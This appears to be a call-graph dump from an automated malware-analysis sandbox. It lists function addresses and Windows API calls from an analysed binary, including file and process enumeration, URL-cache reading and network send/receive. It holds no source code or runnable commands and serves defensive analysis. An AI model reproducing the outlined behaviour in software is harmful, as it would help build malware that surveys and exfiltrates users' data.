_$I10_OUTPUT 5 API calls 58032->58035 58033->58032 58036 69e8ecd2 58034->58036 58037 69e8eca3 58035->58037 58036->57990 58037->57990 58039 69e8eb3d _memset 58039->58021 58039->58026 58039->58028 58040 69e84f40 80 API calls ctype 58039->58040 58064 69e8e1f0 58039->58064 58097 69e8d5f0 67 API calls 5 library calls 58039->58097 58098 69e8db10 5 API calls 2 library calls 58039->58098 58040->58039 58043 69e90899 _memset 58042->58043 58109 69ebfeae 58043->58109 58054->57979 58056->57987 58057->57991 58058->57995 58059->58000 58060->58005 58061->58007 58062->57979 58063->58039 58066 69e8e255 _memset 58064->58066 58065 69e8e270 select 58065->58066 58083 69e8e2a1 58065->58083 58066->58065 58067 69e8e2a8 recv 58066->58067 58070 69e8e309 _strncmp 58066->58070 58066->58083 58067->58066 58067->58083 58068 69ebe9d7 _$I10_OUTPUT 5 API calls 58069 69e8e695 58068->58069 58069->58039 58070->58083 58099 69ec0968 67 API calls _vscan_fn 58070->58099 58072 69e8e358 58073 69e8bf70 110 API calls 58072->58073 58072->58083 58074 69e8e395 58073->58074 58074->58083 58100 69ec0f76 77 API calls __mbsstr_l 58074->58100 58076 69e8e3b0 58076->58083 58101 69e8eee0 80 API calls 58076->58101 58078 69e8e3fc 58083->58068 58097->58039 58098->58039 58099->58072 58100->58076 58101->58078 58134 69ecc562 58109->58134 58111 69ebfeb9 58112 69e908ba 58111->58112 58142 69ebfbf6 124 API calls 8 library calls 58111->58142 58114 69ec1f09 58112->58114 58143 69ec1d65 58114->58143 58135 69ec77ba __getptd_noexit 67 API calls 58134->58135 58136 69ecc56a 58135->58136 58137 69ecc570 58136->58137 58138 69ecc594 58136->58138 58140 69ec8dee __malloc_crt 67 API calls 58136->58140 58137->58138 58139 69ec2dca _fgets 67 API calls 58137->58139 58138->58111 58141 69ecc575 58139->58141 58140->58137 58141->58111 58142->58112 58144 69ebeb14 _LocaleUpdate::_LocaleUpdate 77 API calls 58143->58144 58145 69ec1d84 58144->58145 58146 69ec1d8b 58145->58146 58147 69ec1db6 58145->58147 58149 69ec2dca _fgets 67 API calls 58146->58149 58148 69ec1dbe 58147->58148 58158 69ec1de9 58147->58158 58150 69ec2dca _fgets 67 API calls 58148->58150 58152 69ec1d90 58149->58152 58151 69ec1ede 58158->58151 58165 69ec1e94 58158->58165 58168 69eced4c 77 API calls _LocaleUpdate::_LocaleUpdate 58158->58168 58169 69ec151c 124 API calls 6 library calls 58158->58169 58165->58151 58168->58158 58169->58158 58181 47600d 58182 475fc7 58181->58182 58183 475fd0 KiUserCallbackDispatcher 58182->58183 58184 475fe5 58183->58184 58186 475ff4 58183->58186 58184->58186 58187 475de4 58184->58187 58188 475d71 58187->58188 58189 471402 4 API calls 58188->58189 58190 475d97 58188->58190 58189->58190 58190->58186 58191 424d10 58192 424d29 58191->58192 58193 437890 6 API calls 58192->58193 58195 424cb6 58192->58195 58194 424dac 58193->58194 58196 424710 58197 42472a 58196->58197 58198 437890 6 API calls 58197->58198 58199 4247a5 58198->58199 58202 439120 58199->58202 58201 424821 58203 439132 58202->58203 58204 471402 4 API calls 58203->58204 58205 43918a 58204->58205 58206 47f4e4 3 API calls 58205->58206 58207 43919d 58206->58207 58207->58201 58208 436410 58209 47135c 2 API calls 58208->58209 58210 436421 SendMessageA 58209->58210 58211 43644d task 58210->58211 58212 436e10 58213 471402 4 API calls 58212->58213 58214 436e49 58213->58214 58219 47f750 58214->58219 58217 436e7f 58218 436e5e SendMessageA 58218->58217 58224 474452 58219->58224 58221 47f762 58223 46fe20 3 API calls 58221->58223 58222 436e5a 58222->58217 58222->58218 58223->58222 58225 47445f 58224->58225 58226 474474 _memset 58225->58226 58227 47446c 58225->58227 58226->58227 58227->58221 58231 443e10 58232 443e36 58231->58232 58233 443e66 _strlen 58232->58233 58234 443e5a 58232->58234 58233->58234 58235 4220c0 3 API calls 58234->58235 58236 443e8b 58235->58236 58237 443ea0 _strlen 58236->58237 58238 443e94 58236->58238 58237->58238 58239 443ee9 FindFirstFileA 58238->58239 58243 443f24 58239->58243 58244 443eff 58239->58244 58240 44403c FindNextFileA 58240->58243 58240->58244 58241 443f47 _strlen 58241->58243 58242 4220c0 3 API calls 58242->58243 58243->58240 58243->58241 58243->58242 58245 443f8c _strlen 58243->58245 58246 444002 58243->58246 58245->58243 58247 44401d _strncpy 58246->58247 58247->58244 58248 442a10 58249 442a25 58248->58249 58254 442bc0 58249->58254 58252 47135c 2 API calls 58253 442a7f 58252->58253 58255 442be5 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 58254->58255 58256 442a77 58254->58256 58260 442c1d 58255->58260 58256->58252 58257 443541 std::bad_exception::~bad_exception 58257->58256 58260->58257 58261 4414a0 58260->58261 58262 4414b5 58261->58262 58265 4414c7 58261->58265 58263 441230 2 API calls 58262->58263 58262->58265 58264 441546 58263->58264 58264->58265 58266 4414a0 2 API calls 58264->58266 58265->58260 58266->58265 58267 456b10 58268 456b30 _strlen 58267->58268 58292 456b29 58267->58292 58293 404280 58268->58293 58270 456b60 _strlen 58271 404280 6 API calls 58270->58271 58272 456b89 _strlen 58271->58272 58273 404280 6 API calls 58272->58273 58274 456bb2 _memset 58273->58274 58275 456be2 58274->58275 58276 456bfc _sprintf 58275->58276 58277 456c28 58276->58277 58278 456c3d 6 API calls 58277->58278 58279 495e90 58278->58279 58280 456d2a _sprintf _sprintf _sprintf _sprintf 58279->58280 58281 456dba 58280->58281 58282 4041c0 6 API calls 58281->58282 58283 456e01 58282->58283 58284 456e21 _strlen 58283->58284 58285 456e5d 58284->58285 58286 456eca _strlen 58285->58286 58285->58292 58287 404280 6 API calls 58286->58287 58288 456efb 58287->58288 58289 4041c0 6 API calls 58288->58289 58294 404293 58293->58294 58295 4042ba 58294->58295 58296 40429a 58294->58296 58297 405a90 5 API calls 58295->58297 58298 4041c0 6 API calls 58296->58298 58299 4042b8 58297->58299 58298->58299 58299->58270 58300 468010 58301 46802f 58300->58301 58302 468053 58301->58302 58303 46805f _strlen 58301->58303 58304 4220c0 3 API calls 58302->58304 58303->58302 58305 468084 58304->58305 58306 468099 _strlen 58305->58306 58307 46808d 58305->58307 58306->58307 58308 4680db FindFirstFileA 58307->58308 58309 468129 58308->58309 58315 468104 58308->58315 58310 468140 58309->58310 58311 46814c _strlen 58309->58311 58309->58315 58312 4220c0 3 API calls 58310->58312 58311->58310 58313 468171 58312->58313 58314 468191 _strlen 58313->58314 58317 468185 58313->58317 58314->58317 58316 468272 _strncpy 58316->58315 58317->58315 58317->58316 58318 46d510 _memset 58319 46d568 58318->58319 58320 498b5b 6 API calls 58319->58320 58321 46d57a 58319->58321 58320->58319 58322 466a10 58323 466a13 58322->58323 58324 466a25 58323->58324 58325 466a27 Sleep 58323->58325 58325->58323 58326 69e88b3e 58327 69e88b43 58326->58327 58328 69ebf2c5 __wfopen_s 161 API calls 58327->58328 58329 69e88b57 58328->58329 58330 69e88b70 OutputDebugStringA OutputDebugStringA 58329->58330 58331 69e88b8f 58329->58331 58332 69ebf38f __fcloseall 106 API calls 58330->58332 58332->58331 58333 46d710 _memset 58334 46d757 58333->58334 58335 69e920b0 58336 69e920b9 58335->58336 58342 69e920ed 58335->58342 58337 69e920df 58336->58337 58339 69e920f3 Sleep 58336->58339 58338 69ec0763 __free_locale 67 API calls 58337->58338 58340 69e920e7 58338->58340 58339->58336 58341 69ec0763 __free_locale 67 API calls 58340->58341 58341->58342 58343 69e87537 58344 69e8754e _memset 58343->58344 58345 69ebeff0 _sprintf 103 API calls 58344->58345 58346 69e8757f CreateFileA 58345->58346 58347 69e875ad 58346->58347 58348 69e875a1 CloseHandle 58346->58348 58349 69ebe9d7 _$I10_OUTPUT 5 API calls 58347->58349 58348->58347 58350 69e875ce 58349->58350 58351 432b20 58352 432b87 _memset _memset 58351->58352 58354 432c25 58352->58354 58355 427c70 _memset 58354->58355 58356 432c3e 58355->58356 58357 442060 _memset 58356->58357 58358 432c52 58357->58358 58359 432cd1 SendMessageA 58358->58359 58360 432d0d 58358->58360 58359->58360 58361 432cf3 58359->58361 58362 4733ec 3 API calls 58360->58362 58361->58360 58363 432d49 58362->58363 58364 442060 _memset 58363->58364 58366 432d4d 58363->58366 58365 432d65 CreateWindowExA 58364->58365 58365->58366 58367 443620 58368 443637 58367->58368 58369 44362d 58367->58369 58370 47135c 2 API calls 58368->58370 58371 4419f0 2 API calls 58369->58371 58372 443649 58370->58372 58371->58368 58373 4419f0 2 API calls 58372->58373 58374 443659 58372->58374 58373->58374 58375 442aa0 58376 47135c 2 API calls 58375->58376 58377 442ab1 58376->58377 58380 441360 58377->58380 58382 441371 58380->58382 58381 441495 58383 4413eb 58382->58383 58384 4414a0 2 API calls 58382->58384 58385 441440 58383->58385 58386 4414a0 2 API calls 58383->58386 58384->58383 58385->58381 58387 4414a0 2 API calls 58385->58387 58386->58385 58387->58381 58388 4416a0 58389 46de74 _Allocate 4 API calls 58388->58389 58390 4416b0 58389->58390 58393 4415e0 58390->58393 58394 4415f3 58393->58394 58395 441656 58393->58395 58397 42ab10 58394->58397 58399 42ab22 58397->58399 58398 42ab3d _strlen 58400 42ab52 58398->58400 58399->58398 58399->58400 58400->58395 58401 465ca0 _memset _memset 58402 465b20 58401->58402 58403 465cf9 _memset _strlen 58402->58403 58404 46c940 58403->58404 58405 465d3c _strlen 58404->58405 58406 465d56 58405->58406 58407 465de1 _strlen 58405->58407 58409 465d9a _strlen 58406->58409 58408 465dc2 58407->58408 58409->58408 58410 46cd20 58411 46cd45 58410->58411 58412 46cfef WSASend 58410->58412 58411->58412 58413 46cd51 _memset _memset _memset _memset 58411->58413 58414 46d022 58412->58414 58415 46cdd5 58413->58415 58416 46cde6 _memset 58415->58416 58417 46ce0d 58416->58417 58417->58412 58418 46ce96 _strncpy 58417->58418 58419 46ced3 58418->58419 58420 46cef0 _strlen _strlen _strncat 58419->58420 58421 46cf46 58420->58421 58422 46cf63 _strlen 58421->58422 58423 495ea0 58422->58423 58424 46cf88 _strlen _strlen _strlen _strlen 58423->58424 58424->58412 58425 467aa0 58428 467870 58425->58428 58429 467891 58428->58429 58430 46789b 58429->58430 58431 4983ad _malloc 4 API calls 58429->58431 58432 4678ba 58431->58432 58433 4678c6 CloseHandle 58432->58433 58434 4678d7 SetFilePointer 58432->58434 58433->58430 58435 4678fe 58434->58435 58436 467916 58435->58436 58437 467908 CloseHandle 58435->58437 58438 46793a WriteFile 58436->58438 58437->58430 58439 46795c CloseHandle 58438->58439 58440 46796a FindCloseChangeNotification 58438->58440 58439->58430 58440->58430 58441 465720 58448 446160 58441->58448 58443 465730 58444 46573e 58443->58444 58460 4655e0 58443->58460 58446 465743 IWBE 58444->58446 58447 46574d 58446->58447 58449 446194 58448->58449 58467 44ed10 58449->58467 58451 4461d9 58452 446204 _strlen 58451->58452 58453 4461f8 58451->58453 58456 446232 _memset _memset 58451->58456 58452->58453 58455 4220c0 3 API calls 58453->58455 58455->58456 58457 4462f2 58456->58457 58478 447a40 58457->58478 58459 44641e 58459->58443 58461 465667 58460->58461 58462 465706 58461->58462 58463 465695 _strlen 58461->58463 58464 4656b9 _strlen 58461->58464 58465 4656dd _strlen 58461->58465 58521 464e50 _memset _memset _memset 58461->58521 58462->58444 58463->58461 58464->58461 58465->58461 58495 44e780 58467->58495 58469 44ed3d 58470 44c970 29 API calls 58469->58470 58477 44ee58 58469->58477 58471 44eda8 58470->58471 58502 4502e0 23 API calls __localtime64_s 58471->58502 58473 44ee3e 58503 450380 23 API calls __localtime64_s 58473->58503 58475 44ee4b 58504 450410 23 API calls __localtime64_s 58475->58504 58477->58451 58485 447a5b 58478->58485 58479 447b3a _memset 58479->58485 58480 447b9c _rand 58480->58485 58481 447c39 _memset 58481->58485 58482 448718 _strlen 58482->58485 58483 447ceb _memset 58483->58485 58484 447eb1 _memset 58484->58485 58485->58479 58485->58480 58485->58481 58485->58482 58485->58483 58485->58484 58486 447ee1 _strlen 58485->58486 58487 448655 58485->58487 58488 447f33 _memset _memset 58485->58488 58489 447df1 _memset 58485->58489 58490 44eee0 17 API calls 58485->58490 58491 4480d8 _strlen 58485->58491 58492 448367 _strlen 58485->58492 58493 44822a _strlen 58485->58493 58505 44b590 58485->58505 58486->58485 58487->58459 58488->58485 58489->58485 58490->58485 58491->58485 58492->58485 58493->58485 58496 4983ad _malloc 4 API calls 58495->58496 58497 44e7a6 58496->58497 58498 44e7b2 58497->58498 58499 44e7ba _memset 58497->58499 58498->58469 58500 44e7dd 58499->58500 58501 44e7e6 _rand 58500->58501 58501->58498 58502->58473 58503->58475 58504->58477 58512 44b5b1 58505->58512 58506 448b50 2 API calls 58506->58512 58508 44b5c3 58508->58485 58509 44b62e _memset _memset 58509->58512 58510 44b6d0 _strlen 58510->58512 58511 44b723 _strlen 58511->58512 58512->58506 58512->58508 58512->58509 58512->58510 58512->58511 58513 44b776 _strlen 58512->58513 58514 4220c0 _memmove_s _memcpy_s _memcpy_s 58512->58514 58515 449fb0 58512->58515 58513->58512 58514->58512 58516 498fa0 58515->58516 58517 449fbd _memset _memset 58516->58517 58519 44a033 58517->58519 58518 44a107 58518->58512 58519->58518 58520 44a132 recv 58519->58520 58520->58518 58520->58519 58554 46c8a0 58521->58554 58523 464ebe 58524 464ec6 _strlen 58523->58524 58525 464f11 _strlen 58523->58525 58527 464eeb 58524->58527 58526 464fb9 58525->58526 58549 464fc5 58526->58549 58558 4659e0 58526->58558 58528 464ef4 _memset 58527->58528 58529 464ef2 58527->58529 58528->58525 58529->58525 58557 46c8ab 58554->58557 58556 46c8c4 58556->58523 58557->58556 58566 46c7b0 58557->58566 58567 4988a0 26 API calls 58566->58567 58571 46c7dc 58567->58571 58568 46c7fb _feof 58569 46c84f 58568->58569 58568->58571 58571->58568 58573 46c7e8 58571->58573 58574 49963e 58571->58574 58573->58557 58577 4995a8 58574->58577 58628 69e8b100 58629 69ebed6c _malloc 67 API calls 58628->58629 58631 69e8b120 _memset 58629->58631 58630 69e8b12d 58631->58630 58632 69ebed6c _malloc 67 API calls 58631->58632 58638 69e8b14b _memset 58632->58638 58633 69e8b158 58634 69e8b180 CreateEventA 58634->58638 58641 69e8b24a 58634->58641 58635 69e8b200 WaitForMultipleObjects 58637 69e8b216 58635->58637 58635->58641 58636 69e8b1dc 58636->58635 58636->58636 58640 69ec0763 __free_locale 67 API calls 58637->58640 58638->58633 58638->58634 58638->58636 58639 69ebef37 143 API calls 58638->58639 58639->58638 58640->58641 58642 69e82d00 58645 69eb06f0 58642->58645 58646 69eb06fa 58645->58646 58652 69eb0a98 GetModuleFileNameA 58646->58652 58648 69e82d05 58650 69eb0711 InterlockedExchange 58650->58648 58653 69eb0aca 58652->58653 58657 69eb0afa 58652->58657 58654 69eb0ace PathFindExtensionA 58653->58654 58653->58657 58660 69eb0829 58654->58660 58656 69ebe9d7 _$I10_OUTPUT 5 API calls 58658 69eb0704 58656->58658 58657->58656 58658->58648 58659 69eb05c5 110 API calls ctype 58658->58659 58659->58650 58682 69ec3afb 58660->58682 58662 69eb0838 GetModuleHandleA GetProcAddress 58663 69eb0881 ConvertDefaultLocale ConvertDefaultLocale GetProcAddress 58662->58663 58664 69eb0926 GetModuleHandleA 58662->58664 58666 69eb0996 GetModuleFileNameA 58663->58666 58670 69eb08e8 ConvertDefaultLocale ConvertDefaultLocale 58663->58670 58665 69eb0931 EnumResourceLanguagesA 58664->58665 58664->58666 58665->58666 58667 69eb0957 ConvertDefaultLocale ConvertDefaultLocale 58665->58667 58668 69eb09d9 _memset 58666->58668 58681 69eb09d1 58666->58681 58667->58666 58683 69eb00ad 58668->58683 58670->58666 58677 69eb0a7c 58719 69eb06cb DeactivateActCtx ReleaseActCtx 58677->58719 58679 69eb0a3d 58679->58677 58694 69eb05f9 58679->58694 58718 69ec3b7e 5 API calls _$I10_OUTPUT 58681->58718 58682->58662 58684 69eb015f 58683->58684 58685 69eb00cf GetModuleHandleA 58683->58685 58690 69eb0164 58684->58690 58686 69eb00e7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58685->58686 58688 69eb00e2 58685->58688 58686->58688 58689 69eb0155 58688->58689 58720 69eaf4c1 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 58688->58720 58689->58684 58691 69eb0179 58690->58691 58692 69eb0175 58690->58692 58691->58692 58693 69eb0188 CreateActCtxA 58691->58693 58692->58679 58693->58692 58695 69eb063b GetLocaleInfoA 58694->58695 58696 69eb0623 58694->58696 58698 69eb06bb 58695->58698 58699 69eb0630 ctype 58695->58699 58724 69ebf40b 67 API calls _fgets 58696->58724 58702 69ebe9d7 _$I10_OUTPUT 5 API calls 58698->58702 58700 69ec2dca _fgets 67 API calls 58699->58700 58701 69eb0653 58700->58701 58703 69ec2dca _fgets 67 API calls 58701->58703 58704 69eb06c9 58702->58704 58705 69eb065a 58703->58705 58704->58679 58721 69ebf08b 58705->58721 58719->58681 58720->58686 58726 69ebf6f5 58721->58726 58724->58699 58727 69ebf703 58726->58727 58729 69ebf723 58726->58729 58760 69e9ae00 58761 69ec0763 __free_locale 67 API calls 58760->58761 58762 69e9ae0a 58761->58762 58763 69ea4680 CreateToolhelp32Snapshot 58764 69ea46ca Process32First 58763->58764 58765 69ea46b1 58763->58765 58770 69ea46d9 58764->58770 58773 69ea4712 58764->58773 58766 69ebe9d7 _$I10_OUTPUT 5 API calls 58765->58766 58768 69ea46c3 58766->58768 58767 69ebe9d7 _$I10_OUTPUT 5 API calls 58769 69ea4731 58767->58769 58772 69ea4703 Process32Next 58770->58772 58770->58773 58774 69ebec8d 102 API calls 2 library calls 58770->58774 58772->58770 58772->58773 58773->58767 58774->58770 58775 471d29 58777 471d3c 58775->58777 58779 471d37 58775->58779 58776 471d61 NtdllDefWindowProc_A 58776->58779 58777->58776 58778 471d4f 58777->58778 58781 471c36 58778->58781 58782 471c42 __EH_prolog3_catch 58781->58782 58783 48142c 2 API calls 58782->58783 58784 471c51 58783->58784 58789 46f153 58784->58789 58786 471ce8 58786->58779 58791 47135c 2 API calls 58789->58791 58790 46f177 58790->58786 58792 471bc0 58790->58792 58791->58790 58793 471bd1 58792->58793 58794 471c31 58792->58794 58793->58794 58796 470dcb 58793->58796 58794->58786 58797 470ddf 58796->58797 58798 470df7 GetParent 58797->58798 58799 470e02 58797->58799 58803 470de9 58797->58803 58798->58799 58800 470e13 SendMessageA 58799->58800 58799->58803 58801 470e27 58800->58801 58800->58803 58801->58803 58802 470ed1 GetParent 58804 470e6e 58802->58804 58803->58802 58803->58804 58804->58794 58805 4e7e20 58808 4e7670 58805->58808 58807 4e7e38 58809 498fa0 58808->58809 58810 4e767d _memset 58809->58810 58811 4e88b0 58810->58811 58812 4e76d5 _memset _memset 58811->58812 58813 4e7742 58812->58813 58814 4e7778 _memset 58813->58814 58822 4e7746 58813->58822 58816 4e77b9 58814->58816 58815 4e79fe _memset _wcslen 58817 4e7a4a 58815->58817 58816->58815 58816->58822 58818 4e7ab0 _strlen 58817->58818 58820 4e7aa4 58817->58820 58818->58820 58819 4e7bf1 _memset 58825 4e7c45 58819->58825 58820->58819 58820->58822 58821 4e7cc9 58821->58822 58823 4e7db1 _strlen 58821->58823 58822->58807 58823->58822 58824 4e7cf7 GetProcessHeap 58824->58825 58825->58821 58825->58824 58826 429830 58827 429851 58826->58827 58829 42984c 58826->58829 58827->58829 58830 4287e0 58827->58830 58831 428806 58830->58831 58832 42883f _memset 58831->58832 58833 428815 58831->58833 58834 42881e _strlen 58831->58834 58835 428861 58832->58835 58833->58832 58834->58833 58836 4288a3 _strlen 58835->58836 58839 42889a 58835->58839 58836->58839 58837 428a5b 58837->58829 58838 42a410 __mbsinc 58838->58839 58839->58837 58839->58838 58840 423cb0 58843 463860 FindFirstUrlCacheEntryA 58840->58843 58845 4638bb 58843->58845 58844 4638ce FindFirstUrlCacheEntryA 58844->58845 58846 423cc5 58844->58846 58845->58844 58845->58846 58847 463130 58848 460e30 6 API calls 58847->58848 58849 46315c 58848->58849 58851 463168 58849->58851 58852 463080 58849->58852 58855 462be0 58852->58855 58854 4630a4 58854->58851 58856 462c32 58855->58856 58857 4983ad _malloc 4 API calls 58856->58857 58867 462c44 58856->58867 58858 462c5f 58857->58858 58859 4620f0 4 API calls 58858->58859 58858->58867 58860 462d10 58859->58860 58861 4988a0 26 API calls 58860->58861 58870 462df5 58860->58870 58863 462d4a 58861->58863 58862 462110 4 API calls 58862->58870 58864 498760 7 API calls 58863->58864 58863->58870 58869 462d6c 58864->58869 58865 4983ad ___sbh_alloc_block __FF_MSGBANNER __NMSG_WRITE RtlAllocateHeap _malloc 58865->58870 58866 462d6f _wscanf 58866->58869 58867->58854 58868 462ebf _memset 58868->58870 58869->58866 58869->58870 58870->58862 58870->58865 58870->58867 58870->58868 58871 69e82010 58872 69e82019 58871->58872 58877 69e82065 58871->58877 58880 69e827d0 58872->58880 58980 69e826f0 58880->58980 58883 69e826f0 105 API calls 58884 69e82815 58883->58884 58885 69e826f0 105 API calls 58884->58885 58886 69e8282b 58885->58886 58887 69e826f0 105 API calls 58886->58887 58888 69e82841 58887->58888 58889 69e826f0 105 API calls 58888->58889 58890 69e82857 58889->58890 58891 69e826f0 105 API calls 58890->58891 58892 69e8286d 58891->58892 58893 69e826f0 105 API calls 58892->58893 58894 69e82883 58893->58894 58989 69eaf32b 58980->58989 58982 69e82717 _memset _strncpy 58983 69ebeff0 _sprintf 103 API calls 58982->58983 58984 69e82784 58983->58984 58993 69e9dd40 58984->58993 58987 69ebe9d7 _$I10_OUTPUT 5 API calls 58988 69e827c4 58987->58988 58988->58883 58991 69eaf333 58989->58991 58990 69ebed6c _malloc 67 API calls 58990->58991 58991->58990 58992 69eaf355 58991->58992 58992->58982 58994 69e9dd55 58993->58994 58995 69e9dd46 58993->58995 58997 69e82798 58994->58997 59000 69eaf4c1 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 58994->59000 58999 69eaf370 69 API calls 2 library calls 58995->58999 58997->58987 58999->58994 59000->58997 59001 69ec3591 59002 69ec359c 59001->59002 59003 69ec35a1 59001->59003 59019 69ecfc69 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 59002->59019 59007 69ec349b 59003->59007 59006 69ec35af 59009 69ec34a7 _fgets 59007->59009 59008 69ec34f4 59016 69ec3544 _fgets 59008->59016 59070 69eaf2dd 59008->59070 59009->59008 59009->59016 59020 69ec3366 59009->59020 59013 69ec3524 59014 69ec3366 __CRT_INIT@12 156 API calls 59013->59014 59013->59016 59014->59016 59015 69eaf2dd ___DllMainCRTStartup 110 API calls 59017 69ec351b 59015->59017 59016->59006 59018 69ec3366 __CRT_INIT@12 156 API calls 59017->59018 59018->59013 59019->59003 59021 69ec3375 59020->59021 59022 69ec33f1 59020->59022 59074 69ec8854 HeapCreate 59021->59074 59024 69ec3428 59022->59024 59025 69ec33f7 59022->59025 59026 69ec342d 59024->59026 59027 69ec3486 59024->59027 59029 69ec3380 59025->59029 59032 69ec3412 59025->59032 59085 69ec21f4 67 API calls _doexit 59025->59085 59030 69ec7645 ___set_flsgetvalue 8 API calls 59026->59030 59027->59029 59090 69ec797c 79 API calls 2 library calls 59027->59090 59029->59008 59033 69ec3432 59030->59033 59031 69ec3387 59076 69ec79ea 78 API calls 7 library calls 59031->59076 59032->59029 59086 69ecf437 68 API calls __free_locale 59032->59086 59037 69ec8e33 __calloc_crt 67 API calls 59033->59037 59039 69ec343e 59037->59039 59039->59029 59041 69ec344a 59039->59041 59040 69ec341c 59087 69ec7696 70 API calls 2 library calls 59040->59087 59089 69ec75aa 6 API calls __crt_waiting_on_module_handle 59041->59089 59044 69ec338c __RTC_Initialize 59048 69ec339c GetCommandLineA 59044->59048 59063 69ec3390 59044->59063 59046 69ec3395 59046->59029 59047 69ec3421 59088 69ec8884 VirtualFree HeapFree HeapFree HeapDestroy 59047->59088 59078 69ecfb32 76 API calls 3 library calls 59048->59078 59049 69ec345c 59055 69ec347a 59049->59055 59056 69ec3463 59049->59056 59052 69ec33ac 59079 69ecf1e3 72 API calls 3 library calls 59052->59079 59054 69ec33b6 59057 69ec33ba 59054->59057 59081 69ecfa77 112 API calls 3 library calls 59054->59081 59059 69ec0763 __free_locale 67 API calls 59055->59059 59058 69ec76d3 __mtinit 67 API calls 59056->59058 59080 69ec7696 70 API calls 2 library calls 59057->59080 59062 69ec346a GetCurrentThreadId 59058->59062 59059->59046 59062->59029 59077 69ec8884 VirtualFree HeapFree HeapFree HeapDestroy 59063->59077 59064 69ec33c6 59065 69ec33da 59064->59065 59082 69ecf7ff 111 API calls 6 library calls 59064->59082 59065->59046 59084 69ecf437 68 API calls __free_locale 59065->59084 59068 69ec33cf 59068->59065 59083 69ec2017 74 API calls 5 library calls 59068->59083 59071 69eaf2f6 59070->59071 59072 69eaf2eb 59070->59072 59071->59013 59071->59015 59072->59071 59091 69eb4b19 59072->59091 59075 69ec337b 59074->59075 59075->59029 59075->59031 59076->59044 59077->59046 59078->59052 59079->59054 59080->59063 59081->59064 59082->59068 59083->59065 59084->59057 59085->59032 59086->59040 59087->59047 59088->59029 59089->59049 59090->59029 59096 69eb51c5 59091->59096 59093 69eb4b4b 59093->59071 59094 69eb4b28 59094->59093 59108 69eb4c81 8 API calls 2 library calls 59094->59108 59097 69eb51d1 __EH_prolog3 59096->59097 59098 69eb521f 59097->59098 59100 69eb5214 59097->59100 59116 69eaf4c1 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 59097->59116 59117 69eb4edb TlsAlloc InitializeCriticalSection RaiseException ctype 59097->59117 59109 69eb4bd0 EnterCriticalSection 59098->59109 59100->59097 59100->59098 59118 69eb4dc3 90 API calls 2 library calls 59100->59118 59105 69eb5232 59119 69eb4f82 88 API calls 3 library calls 59105->59119 59106 69eb5245 ctype 59106->59094 59108->59094 59110 69eb4beb 59109->59110 59111 69eb4c12 LeaveCriticalSection 59109->59111 59110->59111 59112 69eb4bf0 TlsGetValue 59110->59112 59113 69eb4c1b 59111->59113 59112->59111 59114 69eb4bfc 59112->59114 59113->59105 59113->59106 59114->59111 59115 69eb4c01 LeaveCriticalSection 59114->59115 59115->59113 59116->59097 59117->59097 59118->59100 59119->59106 59120 69eaf214 59121 69eaf21f 59120->59121 59122 69eaf286 59120->59122 59148 69eb4561 59121->59148 59124 69eaf2bc 59122->59124 59125 69eaf28c 59122->59125 59141 69eaf267 59124->59141 59172 69eb542c 110 API calls ctype 59124->59172 59127 69eb4b19 ctype 110 API calls 59125->59127 59130 69eaf291 59127->59130 59169 69eb542c 110 API calls ctype 59130->59169 59132 69eaf2c7 59173 69eb5644 111 API calls 4 library calls 59132->59173 59134 69eaf25b 59167 69eb58d2 113 API calls ctype 59134->59167 59136 69eaf2a4 59170 69eb5644 111 API calls 4 library calls 59136->59170 59138 69eb4b19 ctype 110 API calls 59142 69eaf249 59138->59142 59139 69eaf2ce 59174 69eb14fb 118 API calls 2 library calls 59139->59174 59142->59134 59145 69eaf269 59142->59145 59144 69eaf2ab 59171 69eb58d2 113 API calls ctype 59144->59171 59168 69eb4c22 EnterCriticalSection LeaveCriticalSection 59145->59168 59149 69eb51c5 ctype 104 API calls 59148->59149 59150 69eaf22c 59149->59150 59151 69eb5b0e SetErrorMode SetErrorMode 59150->59151 59152 69eb4b19 ctype 110 API calls 59151->59152 59153 69eb5b2b 59152->59153 59175 69eb42c0 59153->59175 59156 69eb4b19 ctype 110 API calls 59157 69eb5b40 59156->59157 59158 69eb5b5d 59157->59158 59183 69eb5988 59157->59183 59160 69eb4b19 ctype 110 API calls 59158->59160 59161 69eb5b62 59160->59161 59162 69eb5b69 59161->59162 59163 69eb5b6e GetModuleHandleA 59161->59163 59206 69eb1b0d 112 API calls ctype 59162->59206 59165 69eaf240 59163->59165 59166 69eb5b7d GetProcAddress 59163->59166 59165->59134 59165->59138 59166->59165 59167->59141 59168->59141 59169->59136 59170->59144 59171->59141 59172->59132 59173->59139 59174->59141 59207 69eb41c4 59175->59207 59178 69eb4306 59180 69eb430d SetLastError 59178->59180 59182 69eb431a 59178->59182 59179 69ebe9d7 _$I10_OUTPUT 5 API calls 59181 69eb43ba 59179->59181 59180->59182 59181->59156 59182->59179 59184 69eb4b19 ctype 110 API calls 59183->59184 59185 69eb59a7 GetModuleFileNameA 59184->59185 59186 69eb59cf 59185->59186 59187 69eb59d8 PathFindExtensionA 59186->59187 59234 69eb6333 RaiseException __CxxThrowException@8 59186->59234 59189 69eb59ef 59187->59189 59190 69eb59f4 59187->59190 59235 69eb6333 RaiseException __CxxThrowException@8 59189->59235 59214 69eb5948 59190->59214 59194 69eb5a1a 59206->59163 59208 69eb41cd GetModuleHandleA 59207->59208 59209 69eb4231 GetModuleFileNameW 59207->59209 59210 69eb41e1 59208->59210 59211 69eb41e6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59208->59211 59209->59178 59209->59182 59213 69eaf4c1 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 59210->59213 59211->59209 59213->59211 59215 69eb5958 PathFindFileNameA 59214->59215 59216 69eb5953 59214->59216 59218 69eb5971 59215->59218 59219 69eb5967 lstrlenA 59215->59219 59241 69eaf4c1 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 59216->59241 59242 69eaf50c 77 API calls 2 library calls 59218->59242 59220 69eb597f 59219->59220 59220->59194 59236 69eb6333 RaiseException __CxxThrowException@8 59220->59236 59241->59215 59242->59220

                                                                                                                                      Executed Functions

                                                                                                                                      Function 69E8E1F0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 350networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

